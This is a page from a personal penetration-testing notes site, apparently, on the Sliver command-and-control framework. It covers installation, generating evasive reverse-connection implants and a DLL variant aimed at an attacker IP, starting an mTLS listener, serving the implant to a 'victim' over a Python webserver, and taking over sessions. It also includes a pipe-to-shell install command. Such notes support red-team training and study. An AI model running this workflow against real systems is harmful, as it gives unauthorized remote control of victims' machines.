πŸ•ΈοΈ
Th4ntis CyberSec
  • πŸ•·οΈ>whoami_
  • πŸ–₯️General Info
    • CyberSec News
    • Getting Started and other Resources
      • CompTIA Certs
        • Security+
        • Pentest+
    • MITRE ATT&CK
    • Cyber Kill Chain
    • Docker
  • πŸ’»Networking
    • General Networking
    • Common Ports and Protocols
    • TCP/IP Model
    • OSI Model
    • Subnetting
    • Wireshark
    • NMap
    • Wireless
      • Wardriving/WiFi Sniffing
    • 3-Way Handshake
  • 🐧Linux
    • Common commands
    • Sudo
    • Files and File contents
    • Sed Awk and Grep
    • Permissions
  • πŸͺŸWindows
    • Event Codes
    • Powershell
    • Internals
    • Active Directory
  • πŸ”ŽOSINT
    • OSINT Tools
    • IP/Domain OSINT
    • Email/Username OSINT
    • URL OSINT and Sandboxing
    • Social Media OSINT
    • Website OSINT
    • Password OSINT
    • Physical Location OSINT
    • Image OSINT
    • People OSINT
    • Phone Number OSINT
    • Shodan
    • Google Dorking
  • πŸ› οΈTools
    • Brute Force
      • Hydra
    • Credential Dumping
      • Mimikatz
    • Enumeration
      • Bloodhound
      • Certipy
      • Dirb/Dirbuster
      • Enum4Linux
      • GoBuster
    • Exploitation Framework
      • Metasploit
      • Sliver
      • Cobalt Strike
    • Hash Cracking
      • Hashcat
      • JohnTheRipper
    • Methods
      • Powershell Obfuscation
      • Privilege Escalation
      • Pass-The-Hash
      • Kerberos and Kerberoasting
    • Vulnerability Scanners
      • Nessus
      • OpenVAS
    • Web App
      • BurpSuite
      • OWASP Zap
    • Wireless
      • Aircrack-ng
      • Kismet
      • Bettercap
      • HCXDumptool
      • Wifite
    • Impacket
    • Social-Engineer Toolkit (SET)
  • πŸ“”Guides and How-To's
    • Lab Setup
      • Ubuntu VM
      • Kali VM
      • Windows User VM
      • Windows Server VM
    • Wardriving
      • Pwnagotchi
    • Wireless Pentesting
      • WiFi Pineapple Basics
      • Evil-Twin Attack
    • Over The Wire
      • Bandit
      • Natas
      • Leviathan
      • Krypton
      • Narnia
      • Behemoth
      • Utumno
      • Maze
      • Vortex
      • Manpage
    • Docker and Kali Linux
    • Staying Private and goin Dark Online
  • πŸ“•Quick References
    • Tools
      • Tmux
      • NMap
      • Ffuf
      • NetExec
      • CrackMapExec
      • Proxychains
      • OneDriveUser Enum
      • Hashcat
    • One-liners
    • Reverse Shells
    • Post Exploitation
    • Enumeration
      • Google
      • Sublist3r
      • NMap
      • DNSDumpster
    • Hashcracking
    • Wireless
  • πŸ““Courses
    • PNPT
      • Practical Ethical Hacking
      • Windows Privilege Escalation
      • Linux Privilege Escalation
      • OSINT Fundamentals
      • External Pentest Playbook
  • ☁️TryHackMe
    • Attacking Kerberos
    • Hacking with Powershell
    • Powershell for Pentesters
    • Linux PrivEsc
    • Windows PrivEsc
    • Blue
    • Kenobi
  • πŸ“¦HackTheBox
    • Starting Point
      • Tier 0
        • Meow
        • Fawn
        • Dancing
        • Redeemer
        • Explosion
        • Preignition
        • Mongod
        • Synced
      • Tier 1
        • Appointment
        • Sequel
        • Crocodile
        • Responder
        • Three
        • Ignition
        • Bike
        • Funnel
        • Pennyworth
        • Tactics
      • Tier 2
        • Archetype
        • Oopsie
        • Vaccine
        • Unified
        • Included
        • Markup
        • Base
    • Walkthroughs
      • Lame
      • Analytics
      • Manager
      • Codify
Powered by GitBook
On this page
  • Installing
  • Pre-reqs
  • Running
  • Install on system
  • Standalone release
  • Usage
  • Making a payload
  • Starting The MTLS Listener
  • Exploit
Edit on GitHub
  1. Tools
  2. Exploitation Framework

Sliver

Last updated 1 year ago

is an open source projected created and maintained by as an open source multi-platform adversary emulation and red team tool. Sliver facilitates the generations of reverse connection payloads as EXE, DLL, or Shellcode.

Installing

It has binaries for Windows, Linux, MacOS allowing you to deploy Sliver C2 infrastructure on any system.

Pre-reqs

sudo apt install -y mingw-w64 binutils-mingw-w64 g++-mingw-w64

Running

This can be downloaded directly from the using wget or directly.

Install on system

curl https://sliver.sh/install | sudo bash

Run it

sliver

Standalone release

wget https://github.com/BishopFox/sliver/releases/download/v1.4.14/sliver-server_linux.zip

Unzip the file

unzip sliver-server_linux.zip

Make it executable

chmod +x sliver-server

run it

sudo ./sliver-server

Usage

Making a payload

to generate at payload you must know your IP address(external if this is hosted externally). This will generate a randomly named executable file file that can be delivered to targets in a variety of ways. The flags -m and -e flags used above represent Natural-TLS connection to use to connect back on and evasion respectively. The IP address entered is the IP address of your Sliver server.

generate -m (attacker ip) -e

The executable file will be in the folder where sliver was run.

Making .dll payload

generate β€”mtls (attacker ip) β€”format shared β€”skip-symbols

Starting The MTLS Listener

The listener must be started before the delivery and exectuion of the payload on a target system. This listener will display all active connectsions from target systems to your C2 server.

mtls

Exploit

Get the executable onto the victim. I'll do this via a quick python webserver.

python3 -m http.server 8008

When the server is being accessed and a file is being downloaded

On the victim machine go to the webserver and click on the file you want to download

Once it is executed, we should see the connection from the sliver terminal.

We can also check on active sessions or alive sessions with sessions

Connect to the session

sessions -i (session id)

Run whatever commands you may need/want:

πŸ› οΈ
Sliver
BishopFox
Sliver Wiki
Sliver Repo